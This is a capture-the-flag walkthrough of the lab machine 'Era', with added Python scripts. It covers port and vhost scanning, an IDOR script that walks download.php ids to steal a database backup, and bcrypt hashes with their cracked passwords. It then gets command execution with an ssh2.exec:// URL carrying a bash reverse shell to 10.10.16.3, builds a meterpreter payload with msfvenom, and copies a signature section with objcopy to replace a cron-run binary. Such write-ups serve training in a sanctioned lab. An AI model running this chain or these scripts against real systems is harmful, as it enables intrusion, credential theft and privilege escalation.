nmap scan
└─$ nmap -p- --min-rate 1000 -T4 10.129.137.201 -oA nmapfullscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-27 21:19 EDT
Warning: 10.129.137.201 giving up on port because retransmission cap hit (6).
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 30.47% done; ETC: 21:21 (0:01:13 remaining)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.06% done; ETC: 21:21 (0:00:58 remaining)
Nmap scan report for 10.129.137.201
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 157.41 seconds
ffuf vhost scan
ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://era.htb/ -H 'Host: FUZZ.era.htb'
Run it once to learn the size of the default response and filter that out (for example with -fs <size>), otherwise every candidate host name is reported as a hit. The vhost that matters here is file.era.htb.
dirsearch directory scan
dirsearch -u http://file.era.htb/
Register an account and log in
IDOR: stealing the backup
http://file.era.htb/download.php?id=54&dl=true
http://file.era.htb/download.php?id=150&dl=true
The id parameter is not tied to the logged-in user (IDOR), so we walk it and pull down the backup, which contains the sqlite3 DB file.
Cracking the passwords offline (bcrypt hashes, shown as hash:plaintext):
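The enumeration step above, written out as an added example (this is not the write-up's own tooling). It assumes the download.php URL shown in the write-up, a session cookie copied from the browser after registering, and the response heuristics in classify(), which you should tune to whatever file.era.htb actually returns for a missing id:

```python
"""Check download.php for IDOR by walking the id parameter.

Added example for this write-up (not the author's tooling). Assumed: the
BASE_URL from the write-up, a session cookie you copy from your browser
after registering, and the response heuristics in classify(), which you
should tune to what the target actually returns for a missing id.
"""
import argparse
import re
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Dict, Iterable, Iterator, Optional, Tuple

BASE_URL = "http://file.era.htb/download.php"  # from the write-up

# Content-Disposition: attachment; filename="x.zip"  (also filename*=UTF-8''x.zip)
_FILENAME_RE = re.compile(r"filename\*?=(?:UTF-8'')?\"?([^\";]+)\"?", re.I)


@dataclass
class Hit:
    file_id: int
    status: int
    content_type: str
    filename: Optional[str]
    size: int


def build_url(file_id: int, base: str = BASE_URL) -> str:
    # &dl=true forces a download instead of the in-page viewer
    return f"{base}?id={file_id}&dl=true"


def filename_from_headers(headers: Dict[str, str]) -> Optional[str]:
    m = _FILENAME_RE.search(headers.get("content-disposition", ""))
    return m.group(1) if m else None


def classify(file_id: int, status: int, headers: Dict[str, str], body: bytes) -> Optional[Hit]:
    """Decide whether a response is a real file. `headers` keys are lower-case.

    Heuristic (assumption): a 200 whose body is not an HTML error page. An app
    that answers 200 + HTML for every id needs a size or body filter instead.
    """
    if status != 200:
        return None
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype.startswith("text/html") and b"not found" in body.lower():
        return None
    return Hit(file_id, status, ctype, filename_from_headers(headers), len(body))


def fetch(url: str, cookie: str, timeout: float = 10.0) -> Tuple[int, Dict[str, str], bytes]:
    req = urllib.request.Request(url, headers={"Cookie": cookie, "User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, resp.read()
    except urllib.error.HTTPError as err:  # 4xx/5xx responses still carry a body
        return err.code, {k.lower(): v for k, v in err.headers.items()}, err.read()


def walk(ids: Iterable[int], cookie: str, base: str = BASE_URL) -> Iterator[Hit]:
    for file_id in ids:
        status, headers, body = fetch(build_url(file_id, base), cookie)
        hit = classify(file_id, status, headers, body)
        if hit:
            yield hit


if __name__ == "__main__":
    ap = argparse.ArgumentParser()
    ap.add_argument("--cookie", required=True, help='e.g. "PHPSESSID=..."')
    ap.add_argument("--start", type=int, default=1)
    ap.add_argument("--end", type=int, default=200)
    args = ap.parse_args()
    for h in walk(range(args.start, args.end + 1), args.cookie):
        print(f"id={h.file_id} {h.content_type} {h.size}B {h.filename or ''}")
```

The ids the write-up found interesting (54 and 150) fall inside the default range; widen it if the application has more uploads. Keep the rate modest, since every request hits PHP and the backing store.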
$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang
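When the backup's schema is unknown, the quickest way to the hashes is to scan every text cell of every table for bcrypt-shaped strings and write them in a form a cracker accepts. Added example, not the write-up's code; the two hashes are the ones cracked above, but the table layout and the username each hash is paired with are constructed sample data (the page does not show the real schema). The output format is label:hash, which hashcat reads with --username (bcrypt is hash mode 3200):

```python
"""Pull bcrypt hashes out of a sqlite backup whose schema you have not mapped.

Added example, not from the write-up. The two hashes are the ones the write-up
cracked; the table layout and usernames in sample_backup() are constructed,
not the real schema. Output is `label:hash` for `hashcat -m 3200 --username`.
"""
import re
import sqlite3
import sys
from typing import Iterator, List, Tuple

# $2a$/$2b$/$2x$/$2y$, two-digit cost, 22-char salt + 31-char digest = 53 chars
BCRYPT_RE = re.compile(r"\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}")
# Columns whose value we use as the label in front of the hash (assumption)
LABEL_COL_RE = re.compile(r"user|login|name|mail", re.I)


def iter_bcrypt_hashes(conn: sqlite3.Connection) -> Iterator[Tuple[str, str, str]]:
    """Yield (table, label, hash) for every bcrypt-shaped text cell in every table."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        cols = [c[1] for c in conn.execute(f'PRAGMA table_info("{table}")')]
        for row in conn.execute(f'SELECT * FROM "{table}"'):
            rec = dict(zip(cols, row))
            for col, val in rec.items():
                if not (isinstance(val, str) and BCRYPT_RE.fullmatch(val.strip())):
                    continue
                label_cols = [c for c in cols if LABEL_COL_RE.search(c) and c != col]
                label = str(rec[label_cols[0]]) if label_cols else f"{table}.{col}#{rec[cols[0]]}"
                yield table, label, val.strip()


def hashcat_lines(conn: sqlite3.Connection) -> List[str]:
    return [f"{label}:{h}" for _, label, h in iter_bcrypt_hashes(conn)]


def dump(db_path: str, out_path: str) -> int:
    """Write label:hash lines from db_path to out_path; returns the count."""
    conn = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True)  # never modify evidence
    lines = hashcat_lines(conn)
    with open(out_path, "w") as f:
        f.write("".join(line + "\n" for line in lines))
    return len(lines)


def sample_backup() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the stolen backup; the schema and the
    user<->hash pairing are made up for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, note TEXT)")
    conn.executemany("INSERT INTO users (username, password, note) VALUES (?, ?, ?)", [
        ("eric", "$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm", "hash from the write-up"),
        ("admin_ef01cab31aa", "$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.", "hash from the write-up"),
        ("guest", "not-a-hash", None),
    ])
    conn.execute("CREATE TABLE files (id INTEGER PRIMARY KEY, path TEXT)")
    conn.execute("INSERT INTO files (path) VALUES ('backup.zip')")
    return conn


if __name__ == "__main__":
    n = dump(sys.argv[1], sys.argv[2])
    print(f"{n} hashes written to {sys.argv[2]}")
    print(f"crack with: hashcat -m 3200 --username {sys.argv[2]} <wordlist>")
```

Open the database read-only so the copy you later hand over as evidence is byte-identical to what you downloaded. bcrypt at cost 12 is slow, so a targeted wordlist is worth far more than a large one here.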
The credentials from the backup database did not let us log in, so we changed the security-question answers instead.
SSH2 + SSRF = RCE
Log in as admin_ef01cab31aa
Reading the source shows the bug is in the call to fopen: once we are an administrator account, the format parameter we supply reaches fopen unchanged, so we choose which PHP stream wrapper it opens. With the cracked SSH credentials we can therefore make the server open an ssh2.exec:// stream to itself and run a command:
http://file.era.htb/download.php?id=6785&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+>%26+/dev/tcp/10.10.16.3/9001+0>%261;
objcopy: bypassing the file's self-check
Run linpeas.sh to enumerate.
Run pspy64 to watch the cron jobs.
monitor is writable by us, so we generate a payload:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f elf -o reverse.elf
Transfer it to the victim, then extract monitor's signature section (replacing the file outright apparently stops monitor from being executed, so we suspect there is an integrity check):
# extract monitor's signature section into the file sig
objcopy --dump-section .text_sig=sig monitor
# add that section to the malicious file (objcopy modifies reverse.elf in place)
objcopy --add-section .text_sig=sig reverse.elf
Start the msf listener, then copy the patched payload over monitor:
cp reverse.elf monitor
and we get a shell.
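Before overwriting monitor it is worth confirming that objcopy really did copy .text_sig byte-for-byte, since a typo in the section name silently produces a file that fails the same check as the unpatched payload. The following ELF section reader is an added example, not the write-up's code; it handles little-endian ELF64 only, and the tiny ELF builder exists purely to construct offline fixtures (its output has no program headers and is not runnable). One caveat the write-up's result implies: a check that actually verified a signature over the code would not be satisfied by a copied section, so this trick only works because whatever monitor's check looks at is satisfied by the section being present and unchanged.

```python
"""Verify that a patched binary carries the same `.text_sig` section as the original.

Added example, not the write-up's code. Run after `objcopy --dump-section` /
`--add-section` and before `cp reverse.elf monitor`. Little-endian ELF64 only;
build_minimal_elf() is a constructed test fixture, not a real binary.
"""
import struct
import sys
from typing import Dict

EHDR = "<16sHHIQQQIHHHHHH"  # Elf64_Ehdr, 64 bytes
SHDR = "<IIQQQQIIQQ"        # Elf64_Shdr, 64 bytes
SHT_PROGBITS, SHT_STRTAB, SHT_NOBITS = 1, 3, 8


def elf_sections(data: bytes) -> Dict[str, bytes]:
    """Map section name -> raw bytes (empty for SHT_NOBITS or headerless files)."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("only little-endian ELF64 is supported")
    fields = struct.unpack_from(EHDR, data, 0)
    shoff, shentsize, shnum, shstrndx = fields[6], fields[11], fields[12], fields[13]
    if shoff == 0 or shnum == 0:  # section headers stripped: nothing to compare
        return {}
    shdrs = [struct.unpack_from(SHDR, data, shoff + i * shentsize) for i in range(shnum)]
    st = shdrs[shstrndx]                      # .shstrtab holds the section names
    strtab = data[st[4]:st[4] + st[5]]
    out = {}
    for sh in shdrs:
        name = strtab[sh[0]:].split(b"\0", 1)[0].decode("ascii", "replace")
        out[name] = b"" if sh[1] == SHT_NOBITS else data[sh[4]:sh[4] + sh[5]]
    return out


def signature_matches(original: bytes, candidate: bytes, section: str = ".text_sig") -> bool:
    """True only if both files carry `section` and its bytes are identical."""
    a = elf_sections(original).get(section)
    b = elf_sections(candidate).get(section)
    return a is not None and b is not None and a == b


def build_minimal_elf(sections: Dict[str, bytes]) -> bytes:
    """Constructed fixture: a section-only ELF64 (no program headers, not runnable)."""
    names = [""] + list(sections) + [".shstrtab"]
    name_off, shstrtab = {}, b""
    for n in names:
        name_off[n] = len(shstrtab)
        shstrtab += n.encode() + b"\0"
    blobs = list(sections.values()) + [shstrtab]
    body, offsets = b"", []
    for blob in blobs:
        offsets.append(64 + len(body))       # section data follows the 64-byte header
        body += blob
    shoff = 64 + len(body)                    # section header table after the data
    shdrs = [struct.pack(SHDR, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)]  # mandatory null entry
    for i, name in enumerate(names[1:]):
        stype = SHT_STRTAB if name == ".shstrtab" else SHT_PROGBITS
        shdrs.append(struct.pack(SHDR, name_off[name], stype, 0, 0,
                                 offsets[i], len(blobs[i]), 0, 0, 1, 0))
    ident = b"\x7fELF\x02\x01\x01" + b"\0" * 9  # ELF64, little-endian, version 1
    ehdr = struct.pack(EHDR, ident, 2, 0x3E, 1, 0, 0, shoff, 0,
                       64, 0, 0, 64, len(names), len(names) - 1)
    return ehdr + body + b"".join(shdrs)


if __name__ == "__main__":
    orig, patched = (open(p, "rb").read() for p in sys.argv[1:3])
    ok = signature_matches(orig, patched)
    print(".text_sig identical" if ok else ".text_sig missing or different")
    sys.exit(0 if ok else 1)
```

Usage on the box is `python3 check_sig.py monitor reverse.elf` (script name assumed); only copy reverse.elf over monitor when it exits 0. `readelf -S reverse.elf` gives the same presence check by hand, but not the byte comparison.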